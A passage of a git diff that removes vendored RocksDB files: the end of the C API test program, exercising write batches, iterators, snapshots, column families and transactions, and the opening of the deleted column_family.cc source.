-    rocksdb_writebatch_wi_put(wbi, "bay", 3, "d", 1);
-    rocksdb_writebatch_wi_delete_range(wbi, "bar", 3, "bay", 3);
-    rocksdb_write_writebatch_wi(db, woptions, wbi, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "bay", "d");
-    rocksdb_writebatch_wi_clear(wbi);
-    const char* start_list[1] = {"bay"};
-    const size_t start_sizes[1] = {3};
-    const char* end_list[1] = {"baz"};
-    const size_t end_sizes[1] = {3};
-    rocksdb_writebatch_wi_delete_rangev(wbi, 1, start_list, start_sizes, end_list,
-                                     end_sizes);
-    rocksdb_write_writebatch_wi(db, woptions, wbi, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bay", NULL);
-    rocksdb_writebatch_wi_destroy(wbi);
-  }
-
-  StartPhase("writebatch_wi_vectors");
-  {
-    rocksdb_writebatch_wi_t* wb = rocksdb_writebatch_wi_create(0, 1);
-    const char* k_list[2] = { "z", "ap" };
-    const size_t k_sizes[2] = { 1, 2 };
-    const char* v_list[3] = { "x", "y", "z" };
-    const size_t v_sizes[3] = { 1, 1, 1 };
-    rocksdb_writebatch_wi_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_write_writebatch_wi(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", "xyz");
-    rocksdb_writebatch_wi_delete(wb, "zap", 3);
-    rocksdb_write_writebatch_wi(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_wi_destroy(wb);
-  }
-
-  StartPhase("writebatch_wi_savepoint");
-  {
-    rocksdb_writebatch_wi_t* wb = rocksdb_writebatch_wi_create(0, 1);
-    rocksdb_writebatch_wi_set_save_point(wb);
-    const char* k_list[2] = {"z", "ap"};
-    const size_t k_sizes[2] = {1, 2};
-    const char* v_list[3] = {"x", "y", "z"};
-    const size_t v_sizes[3] = {1, 1, 1};
-    rocksdb_writebatch_wi_putv(wb, 2, k_list, k_sizes, 3, v_list, v_sizes);
-    rocksdb_writebatch_wi_rollback_to_save_point(wb, &err);
-    CheckNoError(err);
-    rocksdb_write_writebatch_wi(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "zap", NULL);
-    rocksdb_writebatch_wi_destroy(wb);
-  }
-
-  StartPhase("iter");
-  {
-    rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "foo", "hello");
-    rocksdb_iter_prev(iter);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_prev(iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_last(iter);
-    CheckIter(iter, "foo", "hello");
-    rocksdb_iter_seek(iter, "b", 1);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_seek_for_prev(iter, "g", 1);
-    CheckIter(iter, "foo", "hello");
-    rocksdb_iter_seek_for_prev(iter, "box", 3);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-  }
-
-  StartPhase("wbwi_iter");
-  {
-    rocksdb_iterator_t* base_iter = rocksdb_create_iterator(db, roptions);
-    rocksdb_writebatch_wi_t* wbi = rocksdb_writebatch_wi_create(0, 1);
-    rocksdb_writebatch_wi_put(wbi, "bar", 3, "b", 1);
-    rocksdb_writebatch_wi_delete(wbi, "foo", 3);
-    rocksdb_iterator_t* iter = rocksdb_writebatch_wi_create_iterator_with_base(wbi, base_iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "bar", "b");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_prev(iter);
-    CheckIter(iter, "bar", "b");
-    rocksdb_iter_prev(iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_last(iter);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_seek(iter, "b", 1);
-    CheckIter(iter, "bar", "b");
-    rocksdb_iter_seek_for_prev(iter, "c", 1);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_seek_for_prev(iter, "box", 3);
-    CheckIter(iter, "box", "c");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-    rocksdb_writebatch_wi_destroy(wbi);
-  }
-
-  StartPhase("multiget");
-  {
-    const char* keys[3] = { "box", "foo", "notfound" };
-    const size_t keys_sizes[3] = { 3, 3, 8 };
-    char* vals[3];
-    size_t vals_sizes[3];
-    char* errs[3];
-    rocksdb_multi_get(db, roptions, 3, keys, keys_sizes, vals, vals_sizes, errs);
-
-    int i;
-    for (i = 0; i < 3; i++) {
-      CheckEqual(NULL, errs[i], 0);
-      switch (i) {
-      case 0:
-        CheckEqual("c", vals[i], vals_sizes[i]);
-        break;
-      case 1:
-        CheckEqual("hello", vals[i], vals_sizes[i]);
-        break;
-      case 2:
-        CheckEqual(NULL, vals[i], vals_sizes[i]);
-        break;
-      }
-      Free(&vals[i]);
-    }
-  }
-
-  StartPhase("pin_get");
-  {
-    CheckPinGet(db, roptions, "box", "c");
-    CheckPinGet(db, roptions, "foo", "hello");
-    CheckPinGet(db, roptions, "notfound", NULL);
-  }
-
-  StartPhase("approximate_sizes");
-  {
-    int i;
-    int n = 20000;
-    char keybuf[100];
-    char valbuf[100];
-    uint64_t sizes[2];
-    const char* start[2] = { "a", "k00000000000000010000" };
-    size_t start_len[2] = { 1, 21 };
-    const char* limit[2] = { "k00000000000000010000", "z" };
-    size_t limit_len[2] = { 21, 1 };
-    rocksdb_writeoptions_set_sync(woptions, 0);
-    for (i = 0; i < n; i++) {
-      snprintf(keybuf, sizeof(keybuf), "k%020d", i);
-      snprintf(valbuf, sizeof(valbuf), "v%020d", i);
-      rocksdb_put(db, woptions, keybuf, strlen(keybuf), valbuf, strlen(valbuf),
-                  &err);
-      CheckNoError(err);
-    }
-    rocksdb_approximate_sizes(db, 2, start, start_len, limit, limit_len, sizes);
-    CheckCondition(sizes[0] > 0);
-    CheckCondition(sizes[1] > 0);
-  }
-
-  StartPhase("property");
-  {
-    char* prop = rocksdb_property_value(db, "nosuchprop");
-    CheckCondition(prop == NULL);
-    prop = rocksdb_property_value(db, "rocksdb.stats");
-    CheckCondition(prop != NULL);
-    Free(&prop);
-  }
-
-  StartPhase("snapshot");
-  {
-    const rocksdb_snapshot_t* snap;
-    snap = rocksdb_create_snapshot(db);
-    rocksdb_delete(db, woptions, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_readoptions_set_snapshot(roptions, snap);
-    CheckGet(db, roptions, "foo", "hello");
-    rocksdb_readoptions_set_snapshot(roptions, NULL);
-    CheckGet(db, roptions, "foo", NULL);
-    rocksdb_release_snapshot(db, snap);
-  }
-
-  StartPhase("repair");
-  {
-    // If we do not compact here, then the lazy deletion of
-    // files (https://reviews.facebook.net/D6123) would leave
-    // around deleted files and the repair process will find
-    // those files and put them back into the database.
-    rocksdb_compact_range(db, NULL, 0, NULL, 0);
-    rocksdb_close(db);
-    rocksdb_options_set_create_if_missing(options, 0);
-    rocksdb_options_set_error_if_exists(options, 0);
-    rocksdb_options_set_wal_recovery_mode(options, 2);
-    rocksdb_repair_db(options, dbname, &err);
-    CheckNoError(err);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", NULL);
-    CheckGet(db, roptions, "bar", NULL);
-    CheckGet(db, roptions, "box", "c");
-    rocksdb_options_set_create_if_missing(options, 1);
-    rocksdb_options_set_error_if_exists(options, 1);
-  }
-
-  StartPhase("filter");
-  for (run = 0; run < 2; run++) {
-    // First run uses custom filter, second run uses bloom filter
-    CheckNoError(err);
-    rocksdb_filterpolicy_t* policy;
-    if (run == 0) {
-      policy = rocksdb_filterpolicy_create(
-          NULL, FilterDestroy, FilterCreate, FilterKeyMatch, NULL, FilterName);
-    } else {
-      policy = rocksdb_filterpolicy_create_bloom(10);
-    }
-
-    rocksdb_block_based_options_set_filter_policy(table_options, policy);
-
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    rocksdb_options_set_block_based_table_factory(options, table_options);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo", 3, "foovalue", 8, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar", 3, "barvalue", 8, &err);
-    CheckNoError(err);
-    rocksdb_compact_range(db, NULL, 0, NULL, 0);
-
-    fake_filter_result = 1;
-    CheckGet(db, roptions, "foo", "foovalue");
-    CheckGet(db, roptions, "bar", "barvalue");
-    if (phase == 0) {
-      // Must not find value when custom filter returns false
-      fake_filter_result = 0;
-      CheckGet(db, roptions, "foo", NULL);
-      CheckGet(db, roptions, "bar", NULL);
-      fake_filter_result = 1;
-
-      CheckGet(db, roptions, "foo", "foovalue");
-      CheckGet(db, roptions, "bar", "barvalue");
-    }
-    // Reset the policy
-    rocksdb_block_based_options_set_filter_policy(table_options, NULL);
-    rocksdb_options_set_block_based_table_factory(options, table_options);
-  }
-
-  StartPhase("compaction_filter");
-  {
-    rocksdb_options_t* options_with_filter = rocksdb_options_create();
-    rocksdb_options_set_create_if_missing(options_with_filter, 1);
-    rocksdb_compactionfilter_t* cfilter;
-    cfilter = rocksdb_compactionfilter_create(NULL, CFilterDestroy,
-                                              CFilterFilter, CFilterName);
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options_with_filter, dbname, &err);
-    rocksdb_options_set_compaction_filter(options_with_filter, cfilter);
-    db = CheckCompaction(db, options_with_filter, roptions, woptions);
-
-    rocksdb_options_set_compaction_filter(options_with_filter, NULL);
-    rocksdb_compactionfilter_destroy(cfilter);
-    rocksdb_options_destroy(options_with_filter);
-  }
-
-  StartPhase("compaction_filter_factory");
-  {
-    rocksdb_options_t* options_with_filter_factory = rocksdb_options_create();
-    rocksdb_options_set_create_if_missing(options_with_filter_factory, 1);
-    rocksdb_compactionfilterfactory_t* factory;
-    factory = rocksdb_compactionfilterfactory_create(
-        NULL, CFilterFactoryDestroy, CFilterCreate, CFilterFactoryName);
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options_with_filter_factory, dbname, &err);
-    rocksdb_options_set_compaction_filter_factory(options_with_filter_factory,
-                                                  factory);
-    db = CheckCompaction(db, options_with_filter_factory, roptions, woptions);
-
-    rocksdb_options_set_compaction_filter_factory(
-        options_with_filter_factory, NULL);
-    rocksdb_options_destroy(options_with_filter_factory);
-  }
-
-  StartPhase("merge_operator");
-  {
-    rocksdb_mergeoperator_t* merge_operator;
-    merge_operator = rocksdb_mergeoperator_create(
-        NULL, MergeOperatorDestroy, MergeOperatorFullMerge,
-        MergeOperatorPartialMerge, NULL, MergeOperatorName);
-    // Create new database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    rocksdb_options_set_merge_operator(options, merge_operator);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo", 3, "foovalue", 8, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "foovalue");
-    rocksdb_merge(db, woptions, "foo", 3, "barvalue", 8, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "foo", "fake");
-
-    // Merge of a non-existing value
-    rocksdb_merge(db, woptions, "bar", 3, "barvalue", 8, &err);
-    CheckNoError(err);
-    CheckGet(db, roptions, "bar", "fake");
-
-  }
-
-  StartPhase("columnfamilies");
-  {
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_options_t* db_options = rocksdb_options_create();
-    rocksdb_options_set_create_if_missing(db_options, 1);
-    db = rocksdb_open(db_options, dbname, &err);
-    CheckNoError(err)
-    rocksdb_column_family_handle_t* cfh;
-    cfh = rocksdb_create_column_family(db, db_options, "cf1", &err);
-    rocksdb_column_family_handle_destroy(cfh);
-    CheckNoError(err);
-    rocksdb_close(db);
-
-    size_t cflen;
-    char** column_fams = rocksdb_list_column_families(db_options, dbname, &cflen, &err);
-    CheckNoError(err);
-    CheckEqual("default", column_fams[0], 7);
-    CheckEqual("cf1", column_fams[1], 3);
-    CheckCondition(cflen == 2);
-    rocksdb_list_column_families_destroy(column_fams, cflen);
-
-    rocksdb_options_t* cf_options = rocksdb_options_create();
-
-    const char* cf_names[2] = {"default", "cf1"};
-    const rocksdb_options_t* cf_opts[2] = {cf_options, cf_options};
-    rocksdb_column_family_handle_t* handles[2];
-    db = rocksdb_open_column_families(db_options, dbname, 2, cf_names, cf_opts, handles, &err);
-    CheckNoError(err);
-
-    rocksdb_put_cf(db, woptions, handles[1], "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-
-    CheckGetCF(db, roptions, handles[1], "foo", "hello");
-    CheckPinGetCF(db, roptions, handles[1], "foo", "hello");
-
-    rocksdb_delete_cf(db, woptions, handles[1], "foo", 3, &err);
-    CheckNoError(err);
-
-    CheckGetCF(db, roptions, handles[1], "foo", NULL);
-    CheckPinGetCF(db, roptions, handles[1], "foo", NULL);
-
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_put_cf(wb, handles[1], "baz", 3, "a", 1);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put_cf(wb, handles[1], "bar", 3, "b", 1);
-    rocksdb_writebatch_put_cf(wb, handles[1], "box", 3, "c", 1);
-    rocksdb_writebatch_delete_cf(wb, handles[1], "bar", 3);
-    rocksdb_write(db, woptions, wb, &err);
-    CheckNoError(err);
-    CheckGetCF(db, roptions, handles[1], "baz", NULL);
-    CheckGetCF(db, roptions, handles[1], "bar", NULL);
-    CheckGetCF(db, roptions, handles[1], "box", "c");
-    CheckPinGetCF(db, roptions, handles[1], "baz", NULL);
-    CheckPinGetCF(db, roptions, handles[1], "bar", NULL);
-    CheckPinGetCF(db, roptions, handles[1], "box", "c");
-    rocksdb_writebatch_destroy(wb);
-
-    const char* keys[3] = { "box", "box", "barfooxx" };
-    const rocksdb_column_family_handle_t* get_handles[3] = { handles[0], handles[1], handles[1] };
-    const size_t keys_sizes[3] = { 3, 3, 8 };
-    char* vals[3];
-    size_t vals_sizes[3];
-    char* errs[3];
-    rocksdb_multi_get_cf(db, roptions, get_handles, 3, keys, keys_sizes, vals, vals_sizes, errs);
-
-    int i;
-    for (i = 0; i < 3; i++) {
-      CheckEqual(NULL, errs[i], 0);
-      switch (i) {
-      case 0:
-        CheckEqual(NULL, vals[i], vals_sizes[i]); // wrong cf
-        break;
-      case 1:
-        CheckEqual("c", vals[i], vals_sizes[i]); // bingo
-        break;
-      case 2:
-        CheckEqual(NULL, vals[i], vals_sizes[i]); // normal not found
-        break;
-      }
-      Free(&vals[i]);
-    }
-
-    rocksdb_iterator_t* iter = rocksdb_create_iterator_cf(db, roptions, handles[1]);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-
-    for (i = 0; rocksdb_iter_valid(iter) != 0; rocksdb_iter_next(iter)) {
-      i++;
-    }
-    CheckCondition(i == 1);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    rocksdb_column_family_handle_t* iters_cf_handles[2] = { handles[0], handles[1] };
-    rocksdb_iterator_t* iters_handles[2];
-    rocksdb_create_iterators(db, roptions, iters_cf_handles, iters_handles, 2, &err);
-    CheckNoError(err);
-
-    iter = iters_handles[0];
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_destroy(iter);
-
-    iter = iters_handles[1];
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-
-    for (i = 0; rocksdb_iter_valid(iter) != 0; rocksdb_iter_next(iter)) {
-      i++;
-    }
-    CheckCondition(i == 1);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    rocksdb_drop_column_family(db, handles[1], &err);
-    CheckNoError(err);
-    for (i = 0; i < 2; i++) {
-      rocksdb_column_family_handle_destroy(handles[i]);
-    }
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    rocksdb_options_destroy(db_options);
-    rocksdb_options_destroy(cf_options);
-  }
-
-  StartPhase("prefix");
-  {
-    // Create new database
-    rocksdb_options_set_allow_mmap_reads(options, 1);
-    rocksdb_options_set_prefix_extractor(options, rocksdb_slicetransform_create_fixed_prefix(3));
-    rocksdb_options_set_hash_skip_list_rep(options, 5000, 4, 4);
-    rocksdb_options_set_plain_table_factory(options, 4, 10, 0.75, 16);
-    rocksdb_options_set_allow_concurrent_memtable_write(options, 0);
-
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_put(db, woptions, "foo1", 4, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo2", 4, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "foo3", 4, "foo", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar1", 4, "bar", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar2", 4, "bar", 3, &err);
-    CheckNoError(err);
-    rocksdb_put(db, woptions, "bar3", 4, "bar", 3, &err);
-    CheckNoError(err);
-
-    rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-
-    rocksdb_iter_seek(iter, "bar", 3);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    CheckCondition(rocksdb_iter_valid(iter));
-
-    CheckIter(iter, "bar1", "bar");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "bar2", "bar");
-    rocksdb_iter_next(iter);
-    CheckIter(iter, "bar3", "bar");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    rocksdb_readoptions_set_total_order_seek(roptions, 1);
-    iter = rocksdb_create_iterator(db, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-
-    rocksdb_iter_seek(iter, "ba", 2);
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "bar1", "bar");
-
-    rocksdb_iter_destroy(iter);
-    rocksdb_readoptions_set_total_order_seek(roptions, 0);
-
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-  }
-
-  StartPhase("cuckoo_options");
-  {
-    rocksdb_cuckoo_table_options_t* cuckoo_options;
-    cuckoo_options = rocksdb_cuckoo_options_create();
-    rocksdb_cuckoo_options_set_hash_ratio(cuckoo_options, 0.5);
-    rocksdb_cuckoo_options_set_max_search_depth(cuckoo_options, 200);
-    rocksdb_cuckoo_options_set_cuckoo_block_size(cuckoo_options, 10);
-    rocksdb_cuckoo_options_set_identity_as_first_hash(cuckoo_options, 1);
-    rocksdb_cuckoo_options_set_use_module_hash(cuckoo_options, 0);
-    rocksdb_options_set_cuckoo_table_factory(options, cuckoo_options);
-
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_cuckoo_options_destroy(cuckoo_options);
-  }
-
-  StartPhase("iterate_upper_bound");
-  {
-    // Create new empty database
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_options_set_prefix_extractor(options, NULL);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_put(db, woptions, "a",    1, "0",    1, &err); CheckNoError(err);
-    rocksdb_put(db, woptions, "foo",  3, "bar",  3, &err); CheckNoError(err);
-    rocksdb_put(db, woptions, "foo1", 4, "bar1", 4, &err); CheckNoError(err);
-    rocksdb_put(db, woptions, "g1",   2, "0",    1, &err); CheckNoError(err);
-
-    // testing basic case with no iterate_upper_bound and no prefix_extractor
-    {
-       rocksdb_readoptions_set_iterate_upper_bound(roptions, NULL, 0);
-       rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-
-       rocksdb_iter_seek(iter, "foo", 3);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo", "bar");
-
-       rocksdb_iter_next(iter);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo1", "bar1");
-
-       rocksdb_iter_next(iter);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "g1", "0");
-
-       rocksdb_iter_destroy(iter);
-    }
-
-    // testing iterate_upper_bound and forward iterator
-    // to make sure it stops at bound
-    {
-       // iterate_upper_bound points beyond the last expected entry
-       rocksdb_readoptions_set_iterate_upper_bound(roptions, "foo2", 4);
-
-       rocksdb_iterator_t* iter = rocksdb_create_iterator(db, roptions);
-
-       rocksdb_iter_seek(iter, "foo", 3);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo", "bar");
-
-       rocksdb_iter_next(iter);
-       CheckCondition(rocksdb_iter_valid(iter));
-       CheckIter(iter, "foo1", "bar1");
-
-       rocksdb_iter_next(iter);
-       // should stop here...
-       CheckCondition(!rocksdb_iter_valid(iter));
-
-       rocksdb_iter_destroy(iter);
-    }
-  }
-
-  StartPhase("transactions");
-  {
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    // open a TransactionDB
-    txn_db_options = rocksdb_transactiondb_options_create();
-    txn_options = rocksdb_transaction_options_create();
-    rocksdb_options_set_create_if_missing(options, 1);
-    txn_db = rocksdb_transactiondb_open(options, txn_db_options, dbname, &err);
-    CheckNoError(err);
-
-    // put outside a transaction
-    rocksdb_transactiondb_put(txn_db, woptions, "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-    CheckTxnDBGet(txn_db, roptions, "foo", "hello");
-
-    // delete from outside transaction
-    rocksdb_transactiondb_delete(txn_db, woptions, "foo", 3, &err);
-    CheckNoError(err);
-    CheckTxnDBGet(txn_db, roptions, "foo", NULL);
-
-    // write batch into TransactionDB
-    rocksdb_writebatch_t* wb = rocksdb_writebatch_create();
-    rocksdb_writebatch_put(wb, "foo", 3, "a", 1);
-    rocksdb_writebatch_clear(wb);
-    rocksdb_writebatch_put(wb, "bar", 3, "b", 1);
-    rocksdb_writebatch_put(wb, "box", 3, "c", 1);
-    rocksdb_writebatch_delete(wb, "bar", 3);
-    rocksdb_transactiondb_write(txn_db, woptions, wb, &err);
-    rocksdb_writebatch_destroy(wb);
-    CheckTxnDBGet(txn_db, roptions, "box", "c");
-    CheckNoError(err);
-
-    // begin a transaction
-    txn = rocksdb_transaction_begin(txn_db, woptions, txn_options, NULL);
-    // put
-    rocksdb_transaction_put(txn, "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-    CheckTxnGet(txn, roptions, "foo", "hello");
-    // delete
-    rocksdb_transaction_delete(txn, "foo", 3, &err);
-    CheckNoError(err);
-    CheckTxnGet(txn, roptions, "foo", NULL);
-
-    rocksdb_transaction_put(txn, "foo", 3, "hello", 5, &err);
-    CheckNoError(err);
-
-    // read from outside transaction, before commit
-    CheckTxnDBGet(txn_db, roptions, "foo", NULL);
-
-    // commit
-    rocksdb_transaction_commit(txn, &err);
-    CheckNoError(err);
-
-    // read from outside transaction, after commit
-    CheckTxnDBGet(txn_db, roptions, "foo", "hello");
-
-    // reuse old transaction
-    txn = rocksdb_transaction_begin(txn_db, woptions, txn_options, txn);
-
-    // snapshot
-    const rocksdb_snapshot_t* snapshot;
-    snapshot = rocksdb_transactiondb_create_snapshot(txn_db);
-    rocksdb_readoptions_set_snapshot(roptions, snapshot);
-  
-    rocksdb_transactiondb_put(txn_db, woptions, "foo", 3, "hey", 3,  &err);
-    CheckNoError(err);
-
-    CheckTxnDBGet(txn_db, roptions, "foo", "hello");
-    rocksdb_readoptions_set_snapshot(roptions, NULL);
-    rocksdb_transactiondb_release_snapshot(txn_db, snapshot);
-    CheckTxnDBGet(txn_db, roptions, "foo", "hey");
-
-    // iterate
-    rocksdb_transaction_put(txn, "bar", 3, "hi", 2, &err);
-    rocksdb_iterator_t* iter = rocksdb_transaction_create_iterator(txn, roptions);
-    CheckCondition(!rocksdb_iter_valid(iter));
-    rocksdb_iter_seek_to_first(iter);
-    CheckCondition(rocksdb_iter_valid(iter));
-    CheckIter(iter, "bar", "hi");
-    rocksdb_iter_get_error(iter, &err);
-    CheckNoError(err);
-    rocksdb_iter_destroy(iter);
-
-    // rollback
-    rocksdb_transaction_rollback(txn, &err);
-    CheckNoError(err);
-    CheckTxnDBGet(txn_db, roptions, "bar", NULL);
-
-    // Column families.
-    rocksdb_column_family_handle_t* cfh;
-    cfh = rocksdb_transactiondb_create_column_family(txn_db, options,
-                                                     "txn_db_cf", &err);
-    CheckNoError(err);
-
-    rocksdb_transactiondb_put_cf(txn_db, woptions, cfh, "cf_foo", 6, "cf_hello",
-                                 8, &err);
-    CheckNoError(err);
-    CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", "cf_hello");
-
-    rocksdb_transactiondb_delete_cf(txn_db, woptions, cfh, "cf_foo", 6, &err);
-    CheckNoError(err);
-    CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", NULL);
-
-    rocksdb_column_family_handle_destroy(cfh);
-
-    // close and destroy
-    rocksdb_transaction_destroy(txn);
-    rocksdb_transactiondb_close(txn_db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-    rocksdb_transaction_options_destroy(txn_options);
-    rocksdb_transactiondb_options_destroy(txn_db_options);
-  }
-
-  // Simple sanity check that setting memtable rep works.
-  StartPhase("memtable_reps");
-  {
-    // Create database with vector memtable.
-    rocksdb_options_set_memtable_vector_rep(options);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-
-    // Create database with hash skiplist memtable.
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-    CheckNoError(err);
-
-    rocksdb_options_set_hash_skip_list_rep(options, 5000, 4, 4);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-  }
-
-  // Simple sanity check that options setting db_paths work.
-  StartPhase("open_db_paths");
-  {
-    rocksdb_close(db);
-    rocksdb_destroy_db(options, dbname, &err);
-
-    const rocksdb_dbpath_t* paths[1] = {dbpath};
-    rocksdb_options_set_db_paths(options, paths, 1);
-    db = rocksdb_open(options, dbname, &err);
-    CheckNoError(err);
-  }
-  
-  StartPhase("cleanup");
-  rocksdb_close(db);
-  rocksdb_options_destroy(options);
-  rocksdb_block_based_options_destroy(table_options);
-  rocksdb_readoptions_destroy(roptions);
-  rocksdb_writeoptions_destroy(woptions);
-  rocksdb_compactoptions_destroy(coptions);
-  rocksdb_cache_destroy(cache);
-  rocksdb_comparator_destroy(cmp);
-  rocksdb_dbpath_destroy(dbpath);
-  rocksdb_env_destroy(env);
-
-  fprintf(stderr, "PASS\n");
-  return 0;
-}
-
-#else
-
-int main() {
-  fprintf(stderr, "SKIPPED\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/column_family.cc b/thirdparty/rocksdb/db/column_family.cc
deleted file mode 100644
index 6fd0787..0000000
--- a/thirdparty/rocksdb/db/column_family.cc
+++ /dev/null
@@ -1,1144 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/column_family.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <vector>
-#include <string>
-#include <algorithm>
-#include <limits>
-
-#include "db/compaction_picker.h"
-#include "db/compaction_picker_universal.h"
-#include "db/db_impl.h"
-#include "db/internal_stats.h"
-#include "db/job_context.h"
-#include "db/table_properties_collector.h"
-#include "db/version_set.h"
-#include "db/write_controller.h"
-#include "memtable/hash_skiplist_rep.h"
-#include "monitoring/thread_status_util.h"
-#include "options/options_helper.h"
-#include "table/block_based_table_factory.h"
-#include "util/autovector.h"
-#include "util/compression.h"
-
-namespace rocksdb {
-
-ColumnFamilyHandleImpl::ColumnFamilyHandleImpl(
-    ColumnFamilyData* column_family_data, DBImpl* db, InstrumentedMutex* mutex)
-    : cfd_(column_family_data), db_(db), mutex_(mutex) {
-  if (cfd_ != nullptr) {
-    cfd_->Ref();
-  }
-}
-
-ColumnFamilyHandleImpl::~ColumnFamilyHandleImpl() {
-  if (cfd_ != nullptr) {
-#ifndef ROCKSDB_LITE
-    for (auto& listener : cfd_->ioptions()->listeners) {
-      listener->OnColumnFamilyHandleDeletionStarted(this);
-    }
-#endif  // ROCKSDB_LITE
-    // Job id == 0 means that this is not our background process, but rather
-    // user thread
-    JobContext job_context(0);
-    mutex_->Lock();
-    if (cfd_->Unref()) {
